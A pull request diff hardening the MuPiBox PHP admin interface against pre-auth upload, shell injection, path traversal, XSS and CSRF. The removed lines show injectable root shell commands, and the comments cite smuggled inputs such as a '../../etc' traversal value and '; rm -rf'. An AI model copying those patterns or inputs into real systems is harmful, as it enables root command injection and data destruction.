### PR TITLE
Security Hardening — Pre-Auth, Escape, SSRF, Path-Traversal, CSRF

### DIFF
--- a/AdminInterface/www/admin.php
+++ b/AdminInterface/www/admin.php
@@ -10,37 +10,99 @@
 		exec("sudo -i -u dietpi /usr/local/bin/mupibox/./restart_kiosk.sh");
 		}
 
+	// Narrow header-only auth gate for the submitfile upload handler below.
+	// The handler lives ABOVE `include 'includes/header.php'`, so without
+	// this an unauthenticated LAN POST can drop a crafted zip and have it
+	// extracted to / via `unzip -d /`. All other POST handlers in this
+	// file run AFTER the include — header.php's own auth gate already
+	// blocks them on unauth, so we explicitly do NOT block other POSTs
+	// here. In particular the login POST (password=...) must flow through
+	// to header.php so the user can authenticate in the first place.
+	session_start();
+	$__authJson = file_get_contents('/etc/mupibox/mupiboxconfig.json', true);
+	$__authCfg  = json_decode($__authJson, true);
+	$__loginRequired = !empty($__authCfg['interfacelogin']['state']);
+	$__loggedIn      = isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true;
+	if ($__loginRequired && !$__loggedIn && !empty($_POST['submitfile'])) {
+		http_response_code(403);
+		exit('Authentication required');
+	}
+
 	$shutdown=0;
 	$reboot=0;
 
-	if( $_POST['submitfile'] )
+	if( !empty($_POST['submitfile']) )
 		{
 		$target_dir = "/tmp/";
-		$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
+		// Strip any directory components from the user-controlled filename.
+		// The filename is later interpolated into a shell command, so even
+		// after escapeshellarg() we want the basename so the file lands in
+		// /tmp/ and not somewhere else via a relative path inside the name.
+		$rawName = basename($_FILES["fileToUpload"]["name"]);
+		// Conservative whitelist on filename: letters, digits, dot, dash,
+		// underscore. Anything else (spaces, quotes, semicolons, …) is
+		// rejected outright. Backup zips produced by backup.php/fullbackup.php
+		// match this pattern.
 		$uploadOk = 1;
-		$FileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
-		// Allow zip file format
-		if($FileType != "zip" )
-			{
+		if (!preg_match('/^[A-Za-z0-9._-]+\.zip$/', $rawName)) {
 			$uploadOk = 0;
-			}
+		}
+		$target_file = $target_dir . $rawName;
 		// Check if $uploadOk is set to 0 by an error
 		if ($uploadOk == 0)
 			{
-			$CHANGE_TXT=$CHANGE_TXT."<li>WARNING: Please upload a .zip-File!</li>";
+			$CHANGE_TXT=$CHANGE_TXT."<li>WARNING: Please upload a .zip-File! (only A-Z, 0-9, ._- allowed in filename)</li>";
 			$change=0;
 			}
 		else
 			{
 			if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file))
 				{
+				// ZIP-Slip / arbitrary-path defence. backup.php and
+				// fullbackup.php only ever pack files under three roots —
+				// reject any zip entry that escapes them. Without this,
+				// `unzip -o -a -d /` happily writes anywhere on disk.
+				$allowedPrefixes = [
+					'home/dietpi/MuPiBox/media/',
+					'etc/mupibox/mupiboxconfig.json',
+					'home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/data.json',
+				];
+				$zip = new ZipArchive();
+				$zipOk = false;
+				$badEntry = '';
+				if ($zip->open($target_file) === true) {
+					$zipOk = true;
+					for ($i = 0; $i < $zip->numFiles; $i++) {
+						$entry = $zip->getNameIndex($i);
+						// Normalise: strip leading slash, forbid `..`
+						$norm = ltrim($entry, '/');
+						if (strpos($norm, '..') !== false) {
+							$zipOk = false;
+							$badEntry = $entry;
+							break;
+						}
+						$matched = false;
+						foreach ($allowedPrefixes as $p) {
+							if (strpos($norm, $p) === 0) { $matched = true; break; }
+						}
+						if (!$matched) {
+							$zipOk = false;
+							$badEntry = $entry;
+							break;
+						}
+					}
+					$zip->close();
+				}
+				if (!$zipOk) {
+					exec("sudo rm " . escapeshellarg($target_file));
+					$CHANGE_TXT=$CHANGE_TXT."<li>ERROR: Backup rejected (entry outside whitelist: ".htmlspecialchars($badEntry).")</li>";
+					$change=0;
+				} else {
 				$string = file_get_contents('/etc/mupibox/mupiboxconfig.json', true);
 				$data = json_decode($string, true);
 				$old_version = $data["mupibox"]["version"];
 
-				$command = "sudo unzip -o -a '".$target_file."' -d / >> /tmp/restore.log";
-				#$command = "sudo su - -c \"unzip -o -a '".$target_file."' -d / >> /tmp/restore.log && sleep 1\"";
-				#$command = "sudo su - -c 'tar xvzf ".$target_file." >> /tmp/restore.log'";
+				$command = "sudo unzip -o -a " . escapeshellarg($target_file) . " -d / >> /tmp/restore.log";
 				exec($command, $output, $result );
 				exec("sudo chown root:www-data /etc/mupibox/mupiboxconfig.json");
 				exec("sudo chmod 644 /etc/mupibox/mupiboxconfig.json");
@@ -55,16 +117,17 @@
 				$data["mupibox"]["version"] = $old_version;
 				write_json($data);
 
-				$command = "sudo /boot/dietpi/func/change_hostname " . $data["mupibox"]["host"];
+				$command = "sudo /boot/dietpi/func/change_hostname " . escapeshellarg($data["mupibox"]["host"]);
 				$change_hostname = exec($command, $output, $change_hostname );
 				$command = "sudo su dietpi -c '/usr/local/bin/mupibox/./set_hostname.sh'";
 				exec($command);
-				
-				$command = "sudo rm '".$target_file."'";
+
+				$command = "sudo rm " . escapeshellarg($target_file);
 				exec($command, $output, $result );
 				$change=99;
 				$CHANGE_TXT=$CHANGE_TXT."<li>Backup-File restored! The MuPiBox will reboot now!</li>";
 				$reboot=1;
+				}
 				}
 			else
 				{

--- a/AdminInterface/www/backend.php
+++ b/AdminInterface/www/backend.php
@@ -1,4 +1,9 @@
 <?php
+require __DIR__ . '/includes/auth_check.php';
+
+// backend.php streams pm2 log contents and service status as plain text
+// for XHR consumers in the admin UI. Use the header-only gate so the
+// fetch() body stays free of HTML chrome.
 $logfiles = [
     'server-error' => '/home/dietpi/.pm2/logs/server-error.log',
     'server-out' => '/home/dietpi/.pm2/logs/server-out.log',

--- a/AdminInterface/www/backup.php
+++ b/AdminInterface/www/backup.php
@@ -1,5 +1,12 @@
 <?php
-$command = "sudo rm /var/www/config_backup.zip; sudo zip -r /var/www/config_backup.zip /home/dietpi/MuPiBox/media/cover/* /etc/mupibox/mupiboxconfig.json /home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/data.json;sudo chmod 777 /var/www/config_backup.zip; sudo chown www-data:www-data /var/www/config_backup.zip";
+require __DIR__ . '/includes/auth_check.php';
+
+// The backup zip exposes the bcrypt password hash from interfacelogin and
+// every Spotify/Telegram credential in mupiboxconfig.json. auth_check.php
+// (NOT header.php — header.php would render the admin chrome HTML before
+// we get a chance to set Content-Type: application/octet-stream below)
+// short-circuits with 401 for unauthenticated callers.
+$command = "sudo rm /var/www/config_backup.zip; sudo zip -r /var/www/config_backup.zip /home/dietpi/MuPiBox/media/cover/* /etc/mupibox/mupiboxconfig.json /home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/data.json;sudo chmod 600 /var/www/config_backup.zip; sudo chown www-data:www-data /var/www/config_backup.zip";
 exec($command );
 
 //Define header information

--- a/AdminInterface/www/bluetooth.php
+++ b/AdminInterface/www/bluetooth.php
@@ -24,25 +24,43 @@
 		$CHANGE_TXT=$CHANGE_TXT."<li>BT-Autoconnect-Service disabled</li>";
 		}
 
+	// Both BT-handlers feed a MAC address into a shell exec. The receiving
+	// scripts (pair_bt.sh / remove_bt.sh) already validate the MAC via
+	// regex since CRIT-7, but the shell command line itself is built here
+	// — if we don't validate, an attacker (admin-authenticated, but still)
+	// could squeeze backticks or `; rm -rf` into the parameter and the
+	// shell would expand it before pair_bt.sh ever runs. Defence in depth:
+	// reject anything that isn't a canonical AA:BB:CC:DD:EE:FF MAC, then
+	// escapeshellarg() the value as well.
+	$btMacRegex = '/^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$/';
 	if( $_POST['remove_selected'] )
 		{
-		$command = "sudo -u dietpi /usr/local/bin/mupibox/./remove_bt.sh ".$_POST['remove_mac'];
-		exec($command, $output, $result );
-		$CHANGE_TXT=$CHANGE_TXT."<li>Pairing removed [".$_POST['remove_mac']."</li>";
-		$command = "sudo -u dietpi /usr/local/bin/mupibox/./stop_bt.sh";
-		exec($command, $output, $result );
-		$command = "sudo -u dietpi /usr/local/bin/mupibox/./start_bt.sh";
-		exec($command, $output, $result );
-
-		$change=1;
+		$mac = $_POST['remove_mac'] ?? '';
+		if (!preg_match($btMacRegex, $mac)) {
+			$CHANGE_TXT=$CHANGE_TXT."<li>ERROR: invalid MAC, refused</li>"; $change=1;
+		} else {
+			$command = "sudo -u dietpi /usr/local/bin/mupibox/./remove_bt.sh " . escapeshellarg($mac);
+			exec($command, $output, $result );
+			$CHANGE_TXT=$CHANGE_TXT."<li>Pairing removed [" . htmlspecialchars($mac) . "]</li>";
+			$command = "sudo -u dietpi /usr/local/bin/mupibox/./stop_bt.sh";
+			exec($command, $output, $result );
+			$command = "sudo -u dietpi /usr/local/bin/mupibox/./start_bt.sh";
+			exec($command, $output, $result );
+			$change=1;
+		}
 		}
 
 	if( $_POST['pair_selected'] )
 		{
-		$command = "sudo -u dietpi /usr/local/bin/mupibox/./pair_bt.sh ".$_POST['bt_device'];
-		exec($command, $output, $result );
-		$CHANGE_TXT=$CHANGE_TXT."<li>Device is paired [".$_POST['bt_device']."</li>";
-		$change=1;
+		$mac = $_POST['bt_device'] ?? '';
+		if (!preg_match($btMacRegex, $mac)) {
+			$CHANGE_TXT=$CHANGE_TXT."<li>ERROR: invalid MAC, refused</li>"; $change=1;
+		} else {
+			$command = "sudo -u dietpi /usr/local/bin/mupibox/./pair_bt.sh " . escapeshellarg($mac);
+			exec($command, $output, $result );
+			$CHANGE_TXT=$CHANGE_TXT."<li>Device is paired [" . htmlspecialchars($mac) . "]</li>";
+			$change=1;
+		}
 		}
 
 

--- a/AdminInterface/www/bluetooth.php
+++ b/AdminInterface/www/bluetooth.php
@@ -7,6 +7,14 @@
 	default-agent
 	scan on
 	*/
+	// AR5-15: bluetooth.php was missed by the Phase-5 CSRF sweep. Every
+	// POST handler below runs `sudo systemctl` or `sudo /usr/local/bin/
+	// mupibox/*_bt.sh` — a cross-site request from another admin tab
+	// (or a logged-in admin opening a hostile page) could toggle
+	// Bluetooth, pair an attacker MAC, or remove a paired device. Gate
+	// all writes behind csrf_check() before any other code runs.
+	require_once __DIR__ . '/includes/csrf.php';
+	csrf_check();
 	include ('includes/header.php');
 
 	if( $_POST['change_btac'] == "enable & start" )
@@ -169,11 +177,20 @@
                                 foreach($pairoutput as $device)
                                 {
                                         $split_device=explode(" ", $device);
+                                        // AR5-15: the MAC comes from `bluetoothctl devices` so it's normally
+                                        // a safe AA:BB:CC:DD:EE:FF value, but a paired device with a
+                                        // hostile-name BT stack could in theory emit a forged second
+                                        // column. escapeshellarg for the shell side, htmlspecialchars
+                                        // for the form/HTML side.
+                                        $mac = $split_device[1] ?? '';
+                                        $name = $split_device[2] ?? '';
+                                        $macHtml = htmlspecialchars($mac, ENT_QUOTES);
+                                        $nameHtml = htmlspecialchars($name, ENT_QUOTES);
                                         print "<form class='appnitro'  method='post' action='bluetooth.php' id='remform'>";
-                                        print "<input type='hidden' name='remove_mac' value='".$split_device[1]."'>";
+                                        print "<input type='hidden' name='remove_mac' value='".$macHtml."'>";
                                         print "<input id='saveForm' class='button_text' type='submit' name='remove_selected' value='Remove' />&ensp;";
-                                        print $split_device[2]." [".$split_device[1]."]";
-                                        $command = "sudo -u dietpi bluetoothctl info ".$split_device[1]." | grep 'Connected: yes'";
+                                        print $nameHtml." [".$macHtml."]";
+                                        $command = "sudo -u dietpi bluetoothctl info ".escapeshellarg($mac)." | grep 'Connected: yes'";
                                         unset($connoutput);
                                         exec($command, $connoutput, $connresult );
                                         if( $connoutput[0] )

--- a/AdminInterface/www/content.php
+++ b/AdminInterface/www/content.php
@@ -6,9 +6,14 @@
 <p>Audio books, music and streams can be added here. Control is the same as on the display, but the display is not synchronized. Playing music cannot be started here.</p>
 <?php
         $ip=exec("hostname -I | awk '{print $1}'");
-		
-        print "<div style='max-width:800px;'><p><embed src='http://".$data["mupibox"]["host"].":8200' id='remotecontrol' width='800px' height='480px'></p></div>";
-        print "<p><a href='http://".$ip.":8200' id='remotecontrol' target='_blank'>If it doesn't display properly or can't be served, try this Link and click me...</a></p>";
+        // LOW-2: same XSS vector as vnc.php — host attribute escape.
+        // hostname -I output is system-controlled and shouldn't contain
+        // dangerous chars, but escape it too just in case (hostname could
+        // theoretically be a value an attacker has set elsewhere).
+        $h = htmlspecialchars((string)$data["mupibox"]["host"], ENT_QUOTES, 'UTF-8');
+        $hIp = htmlspecialchars((string)$ip, ENT_QUOTES, 'UTF-8');
+        print "<div style='max-width:800px;'><p><embed src='http://".$h.":8200' id='remotecontrol' width='800px' height='480px'></p></div>";
+        print "<p><a href='http://".$hIp.":8200' id='remotecontrol' target='_blank'>If it doesn't display properly or can't be served, try this Link and click me...</a></p>";
 
 ?>
 

--- a/AdminInterface/www/cover.php
+++ b/AdminInterface/www/cover.php
@@ -3,10 +3,21 @@
 
 	if( $_POST['deleteimage'] )
 		{
-		$file2delete = "/var/www/cover/".$_POST['image'];
-		exec("sudo rm " . $file2delete);
-		$change=1;
-		$CHANGE_TXT=$CHANGE_TXT."<li>Image " . $file2delete . " deleted!</li>";			
+		// `sudo rm /var/www/cover/$image` ran as root, with $image straight
+		// from POST. POSTing image=../../etc/mupibox/mupiboxconfig.json
+		// would happily wipe the box's config. basename() collapses any
+		// path components, and a name whitelist (only filename-safe chars)
+		// rejects shell metacharacters before escapeshellarg.
+		$rawName = basename($_POST['image'] ?? '');
+		if (!preg_match('/^[A-Za-z0-9._-]+$/', $rawName)) {
+			$CHANGE_TXT=$CHANGE_TXT."<li>ERROR: invalid image filename, refused</li>";
+			$change=1;
+		} else {
+			$file2delete = "/var/www/cover/" . $rawName;
+			exec("sudo rm " . escapeshellarg($file2delete));
+			$change=1;
+			$CHANGE_TXT=$CHANGE_TXT."<li>Image " . htmlspecialchars($file2delete) . " deleted!</li>";
+		}
 		}
 	if( $_POST['submitfile'] )
 		{

--- a/AdminInterface/www/cover.php
+++ b/AdminInterface/www/cover.php
@@ -22,11 +22,22 @@
 	if( $_POST['submitfile'] )
 		{
 		$target_dir = "/var/www/cover/";
-		$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
+		// M10: same filename whitelist as the deleteimage branch. basename()
+		// alone strips path components but happily passes "<", quotes, "&",
+		// spaces and unicode lookalikes — those land in the file listing
+		// below and (without htmlspecialchars there) inject into the <img>
+		// tag rendered for every admin who loads cover.php afterwards.
+		// Reject anything that isn't filename-safe ASCII before we even
+		// look at the bytes.
+		$rawName = basename($_FILES["fileToUpload"]["name"] ?? '');
 		$uploadOk = 1;
-		//$FileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
+		if (!preg_match('/^[A-Za-z0-9._-]+\.(jpe?g|png|gif|webp)$/i', $rawName)) {
+			$CHANGE_TXT=$CHANGE_TXT."<li>ERROR: invalid image filename. Use letters, digits, dot, underscore, dash only, with .jpg/.jpeg/.png/.gif/.webp extension.</li>";
+			$uploadOk = 0;
+		}
+		$target_file = $target_dir . $rawName;
 
-		if (is_file($target_file)) {
+		if ($uploadOk && is_file($target_file)) {
 			$CHANGE_TXT=$CHANGE_TXT."<li>There is already an image with this name! This file will be overwritten!</li>";
 		}
 
@@ -104,13 +115,21 @@
 
 	$files = glob('/var/www/cover/*.{jpeg,jpg,png,gif,webp}', GLOB_BRACE);
 	print "<div style='margin:30px;'>";
+	// M10 defence-in-depth: escape every basename and the host into HTML
+	// attribute context. The upload branch now rejects unsafe names, but
+	// older files from before this patch may still live on disk — escape
+	// at render time so legacy data can't break out of the attributes.
+	$hostHtml = htmlspecialchars($data["mupibox"]["host"] ?? '', ENT_QUOTES);
 	foreach($files as $file) {
+		$name = basename($file);
+		$nameHtml = htmlspecialchars($name, ENT_QUOTES);
+		$nameUrl = rawurlencode($name);
 		print "<div style='float: left;margin-right:15px;margin-top:10px;margin-bottom:15px;' align='center'>";
 		print "<form method=\"post\" action=\"cover.php\" id=\"form\" enctype=\"multipart/form-data\">";
-		print "<img src='/cover/".basename($file)."' style='max-width:280px;'>";
+		print "<img src='/cover/".$nameUrl."' style='max-width:280px;'>";
 		print "<br>";
-		print "<p>URL: <a href='http://".$data["mupibox"]["host"]."/cover/".basename($file)."' target='_blank'>http://".$data["mupibox"]["host"]."/cover/".basename($file)."</a>";
-		print "<input type=\"hidden\" name=\"image\" value=\"" . basename($file) . "\">";
+		print "<p>URL: <a href='http://".$hostHtml."/cover/".$nameUrl."' target='_blank'>http://".$hostHtml."/cover/".$nameHtml."</a>";
+		print "<input type=\"hidden\" name=\"image\" value=\"".$nameHtml."\">";
 		print "<br><input type=\"submit\" class=\"button_text\" value=\"Delete Image\" name=\"deleteimage\" ></p>";
 		print "</form></div>";
 	}

--- a/AdminInterface/www/debug.php
+++ b/AdminInterface/www/debug.php
@@ -1,4 +1,10 @@
 <?php
+require __DIR__ . '/includes/auth_check.php';
+
+// chrome_debug.log can contain Spotify OAuth redirect URLs (with the
+// `code` parameter), Authorization headers, and console output from the
+// frontend. auth_check.php gates without emitting HTML so the file
+// download below still streams cleanly.
 $command = "sudo cat /home/dietpi/.config/chromium/chrome_debug.log";
 exec($command, $output, $result );
 //Define header information

--- a/AdminInterface/www/fullbackup.php
+++ b/AdminInterface/www/fullbackup.php
@@ -1,5 +1,10 @@
 <?php
-$command = "sudo rm /var/www/full_backup.zip; sudo zip -r /var/www/full_backup.zip /home/dietpi/MuPiBox/media/* /etc/mupibox/mupiboxconfig.json /home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/data.json;sudo chmod 777 /var/www/full_backup.zip; sudo chown www-data:www-data /var/www/full_backup.zip";
+require __DIR__ . '/includes/auth_check.php';
+
+// Full backup contains every credential in mupiboxconfig.json plus the
+// entire media tree. auth_check.php (header-only gate, no HTML output)
+// keeps the binary download clean.
+$command = "sudo rm /var/www/full_backup.zip; sudo zip -r /var/www/full_backup.zip /home/dietpi/MuPiBox/media/* /etc/mupibox/mupiboxconfig.json /home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/data.json;sudo chmod 600 /var/www/full_backup.zip; sudo chown www-data:www-data /var/www/full_backup.zip";
 exec($command );
 
 //Define header information

--- a/AdminInterface/www/includes/auth_check.php
+++ b/AdminInterface/www/includes/auth_check.php
@@ -1,0 +1,38 @@
+<?php
+// Header-only authentication gate for binary / XHR endpoints.
+//
+// Use instead of `require 'includes/header.php'` whenever the calling
+// page must NOT emit HTML (file downloads with Content-Type:
+// application/octet-stream, JSON/text XHR endpoints, etc.). header.php
+// renders the entire admin chrome, which would land in the browser
+// alongside the binary payload — exactly what produced the "unreadable
+// characters in the browser" report on backup.php after CRIT-2/3/5.
+//
+// This file emits zero output:
+//   - reads mupiboxconfig.json (read-only)
+//   - starts a session
+//   - sends 401 + plain-text body and exit()s if not authenticated
+//   - returns silently otherwise
+//
+// Auth logic mirrors header.php's gate at line ~100 verbatim.
+
+session_start();
+
+$__cfgRaw = file_get_contents('/etc/mupibox/mupiboxconfig.json');
+$__cfg    = json_decode($__cfgRaw, true);
+$__loginRequired = !empty($__cfg['interfacelogin']['state']);
+$__loggedIn      = isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true;
+
+if ($__loginRequired && !$__loggedIn) {
+    http_response_code(401);
+    header('Content-Type: text/plain; charset=utf-8');
+    // Hint to the browser that the admin UI's login form lives at /index.php
+    // — useful when an XHR sees 401 and needs to redirect.
+    header('X-Login-URL: /index.php');
+    echo "Authentication required. Open /index.php first to sign in.\n";
+    exit;
+}
+
+// Session is fresh — bump last_activity so the timeout in header.php
+// stays in sync when the user navigates back into the HTML pages.
+$_SESSION['last_activity'] = time();

--- a/AdminInterface/www/includes/csrf.php
+++ b/AdminInterface/www/includes/csrf.php
@@ -1,0 +1,50 @@
+<?php
+// Per-session CSRF helpers. Kept separate from header.php because
+// header.php emits HTML chrome (DOCTYPE / head / body / topnav) before
+// returning to the calling page — by the time a handler at the top of
+// e.g. service.php tries to call csrf_check(), output has already
+// started and `http_response_code(403)` + `header('Content-Type:')`
+// fail with "Cannot modify header information - headers already sent".
+//
+// To CSRF-protect a destructive POST handler, do this at the very top
+// of the calling file (literal example, but with PHP open/close tags
+// spelled out as words to avoid breaking PHP parsing of THIS file):
+//
+//   open-php-tag
+//   require __DIR__ . '/includes/csrf.php';
+//   csrf_check();   // 403 + exit() if POST without matching token
+//   include('includes/header.php');   // safe to render chrome now
+//   …handlers…
+//
+// And in the form, echo csrf_field() output after the form open tag
+// using a short echo block (open with <?= and close with the standard
+// PHP close marker).
+
+// session_start is idempotent — header.php also calls it, but a second
+// call when one is already active just emits a notice (silenceable
+// by the @-prefix; we leave it noticeable so misuse stays visible).
+if (session_status() === PHP_SESSION_NONE) {
+    session_start();
+}
+
+if (!function_exists('csrf_token')) {
+    function csrf_token(): string {
+        if (empty($_SESSION['csrf_token'])) {
+            $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
+        }
+        return $_SESSION['csrf_token'];
+    }
+    function csrf_field(): string {
+        return '<input type="hidden" name="csrf_token" value="' . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
+    }
+    function csrf_check(): void {
+        if ($_SERVER['REQUEST_METHOD'] !== 'POST') return;
+        $submitted = $_POST['csrf_token'] ?? '';
+        if (!hash_equals(csrf_token(), $submitted)) {
+            http_response_code(403);
+            header('Content-Type: text/plain; charset=utf-8');
+            echo "CSRF token mismatch — please reload the page and try again.\n";
+            exit;
+        }
+    }
+}

--- a/AdminInterface/www/includes/header.php
+++ b/AdminInterface/www/includes/header.php
@@ -1,6 +1,14 @@
 <!DOCTYPE html>
 <?php
 	session_start();
+
+	// CSRF helpers are defined in includes/csrf.php — pages that need
+	// CSRF protection must `require csrf.php` BEFORE include('header.php')
+	// because header.php emits HTML chrome and a post-output csrf_check()
+	// can no longer set 403 headers. Including csrf.php here too keeps
+	// the helpers available for csrf_field() calls deeper in the body.
+	require_once __DIR__ . '/csrf.php';
+
 	if (isset($_POST['spotifyget']) && $_POST['spotifyget'] === 'saving') {
 		if (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') {
 			$http_url = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];

--- a/AdminInterface/www/includes/header.php
+++ b/AdminInterface/www/includes/header.php
@@ -35,26 +35,36 @@
 	$commandLQ="sudo iwconfig wlan0 | awk '/Link Quality/{split($2,a,\"=|/\");print int((a[2]/a[3])*100)\"\"}' | tr -d '%'";
 	$LINKQ=exec($commandLQ);
 	
-	if ($_GET['hshutdown']) {
-		$shutdown = 1;
-		$change=99;
-		$CHANGE_TXT=$CHANGE_TXT."<li>Shutdown MuPiBox</li>";
-		}
-	if ($_GET['hreboot']) {
-		$reboot = 1;
-		$change=99;
-		$CHANGE_TXT=$CHANGE_TXT."<li>Reboot MuPiBox</li>";
-		}
-	if ($_GET['hchromerestart']) {
-		exec("sudo -i -u dietpi /usr/local/bin/mupibox/./restart_kiosk.sh");
-		$change=99;
-		$CHANGE_TXT=$CHANGE_TXT."<li>Restart Chrome kiosk</li>";
-		}
-	if ($_GET['hrefreshdatabase']) {
-		exec("sudo /usr/local/bin/mupibox/./m3u_generator.sh");
-		$change=99;
-		$CHANGE_TXT=$CHANGE_TXT."<li>Update media database finished</li>";
-		}
+	// These GET handlers reboot/shutdown the box and run privileged scripts
+	// (restart_kiosk.sh, m3u_generator.sh). They MUST be gated by the login
+	// check; otherwise an unauthenticated LAN attacker can curl
+	// `?hshutdown=1` and DoS the box, or `?hrefreshdatabase=1` to grind the
+	// SD card. The auth gate further down the file is the single source of
+	// truth for whether the caller is allowed in — mirror it here.
+	$authGatePassed = !$loginEnabled
+		|| (isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true);
+	if ($authGatePassed) {
+		if (isset($_GET['hshutdown'])) {
+			$shutdown = 1;
+			$change=99;
+			$CHANGE_TXT=$CHANGE_TXT."<li>Shutdown MuPiBox</li>";
+			}
+		if (isset($_GET['hreboot'])) {
+			$reboot = 1;
+			$change=99;
+			$CHANGE_TXT=$CHANGE_TXT."<li>Reboot MuPiBox</li>";
+			}
+		if (isset($_GET['hchromerestart'])) {
+			exec("sudo -i -u dietpi /usr/local/bin/mupibox/./restart_kiosk.sh");
+			$change=99;
+			$CHANGE_TXT=$CHANGE_TXT."<li>Restart Chrome kiosk</li>";
+			}
+		if (isset($_GET['hrefreshdatabase'])) {
+			exec("sudo /usr/local/bin/mupibox/./m3u_generator.sh");
+			$change=99;
+			$CHANGE_TXT=$CHANGE_TXT."<li>Update media database finished</li>";
+			}
+	}
 		
 	$mupihat_file = '/tmp/mupihat.json';
 	$mupihat_state = false;

--- a/AdminInterface/www/jsoneditor.php
+++ b/AdminInterface/www/jsoneditor.php
@@ -11,14 +11,17 @@ if (empty($_SESSION['csrf_token'])) {
 $csrfToken = $_SESSION['csrf_token'];
 
 // Erlaubte Dateien
+// AR5-17: the `monitor` and `offline_monitor` keys both pointed at the
+// resume.json paths — clicking those tabs in the editor opened the
+// wrong file content. Corrected to monitor.json / offline_monitor.json.
 $files = [
     'mupiboxconfig' => '/etc/mupibox/mupiboxconfig.json',
     'data' => '/home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/data.json',
     'config' => '/home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/config.json',
     'resume' => '/home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/resume.json',
-    'monitor' => '/home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/resume.json',
+    'monitor' => '/home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/monitor.json',
     'offline_resume' => '/home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/offline_resume.json',
-    'offline_monitor' => '/home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/offline_resume.json'
+    'offline_monitor' => '/home/dietpi/.mupibox/Sonos-Kids-Controller-master/server/config/offline_monitor.json'
 ];
 
 $key = $_GET['file'] ?? 'mupiboxconfig';

--- a/AdminInterface/www/jsoneditor.php
+++ b/AdminInterface/www/jsoneditor.php
@@ -1,6 +1,15 @@
 <?php
 	include ('includes/header.php');
 
+// CSRF token: header.php already started the session. Mint one on demand
+// and require it on every POST. Without this any other tab the admin has
+// open could POST a crafted mupiboxconfig.json and disable interfacelogin
+// or change the password hash.
+if (empty($_SESSION['csrf_token'])) {
+    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
+}
+$csrfToken = $_SESSION['csrf_token'];
+
 // Erlaubte Dateien
 $files = [
     'mupiboxconfig' => '/etc/mupibox/mupiboxconfig.json',
@@ -21,13 +30,71 @@ if (!$file || !file_exists($file)) {
 
 // Speichern
 if ($_SERVER['REQUEST_METHOD'] === 'POST') {
+    $submittedToken = $_POST['csrf_token'] ?? '';
+    if (!hash_equals($csrfToken, $submittedToken)) {
+        $message = "❌ CSRF token mismatch — please reload the page and try again.";
+    } else {
     $json = $_POST['jsondata'] ?? '';
     $decoded = json_decode($json, true);
     if (json_last_error() === JSON_ERROR_NONE) {
-        file_put_contents($file, json_encode($decoded, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));
-        $message = "✅ File saved.";
+        // interfacelogin pinning: when editing mupiboxconfig.json, refuse to
+        // let the editor change `interfacelogin` (state + password hash).
+        // Otherwise an attacker who slips a CSRF past us — or a curious admin
+        // who clears `state` "to test something" — locks themselves out or,
+        // worse, silently re-opens the box. Authentication is managed via
+        // the dedicated login.php, not here.
+        if ($key === 'mupiboxconfig') {
+            $diskRaw = file_get_contents($file);
+            $diskCfg = json_decode($diskRaw, true);
+            if (isset($diskCfg['interfacelogin'])) {
+                $decoded['interfacelogin'] = $diskCfg['interfacelogin'];
+            }
+        }
+
+        // Two-stage write to survive write_json's permission model:
+        // www-data cannot write into /home/dietpi/.mupibox/.../config/
+        // (dir is dietpi:dietpi 755), so a same-dir tempfile fails. Instead:
+        //   1. file_put_contents to /tmp/<rand>  (always writable for www-data)
+        //   2. sudo install -m <orig> -o <orig-owner> -g <orig-group> /tmp/<rand> $file
+        // `install` overwrites in-place via copy, then unlinks the source —
+        // not a same-fs rename, so the cross-fs window is not strictly atomic,
+        // but it matches admin.php's existing write_json() pattern (sudo mv
+        // from /tmp) and preserves owner/perms across the swap.
+        $tmp = '/tmp/.jsoneditor.' . bin2hex(random_bytes(8)) . '.json';
+        $bytes = file_put_contents($tmp, json_encode($decoded, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));
+        if ($bytes === false) {
+            $message = "❌ Could not write temp file (permissions?).";
+        } else {
+            $stat = stat($file);
+            if ($stat === false) {
+                @unlink($tmp);
+                $message = "❌ Could not stat target file.";
+            } else {
+                $mode = sprintf('%04o', $stat['mode'] & 0777);
+                // Resolve owner/group names — install requires names not numeric ids.
+                $ownerInfo = posix_getpwuid($stat['uid']);
+                $groupInfo = posix_getgrgid($stat['gid']);
+                $owner = $ownerInfo ? $ownerInfo['name'] : 'root';
+                $group = $groupInfo ? $groupInfo['name'] : 'root';
+                $cmd = 'sudo install -m ' . escapeshellarg($mode)
+                     . ' -o ' . escapeshellarg($owner)
+                     . ' -g ' . escapeshellarg($group)
+                     . ' ' . escapeshellarg($tmp)
+                     . ' ' . escapeshellarg($file)
+                     . ' 2>&1';
+                exec($cmd, $output, $rc);
+                @unlink($tmp);
+                if ($rc !== 0) {
+                    $message = "❌ Could not commit file (install rc=$rc): "
+                             . htmlspecialchars(implode("\n", $output));
+                } else {
+                    $message = "✅ File saved.";
+                }
+            }
+        }
     } else {
         $message = "❌ Error in JSON: " . json_last_error_msg();
+    }
     }
 }
 
@@ -57,6 +124,7 @@ $pretty = json_encode(json_decode($current, true), JSON_PRETTY_PRINT | JSON_UNES
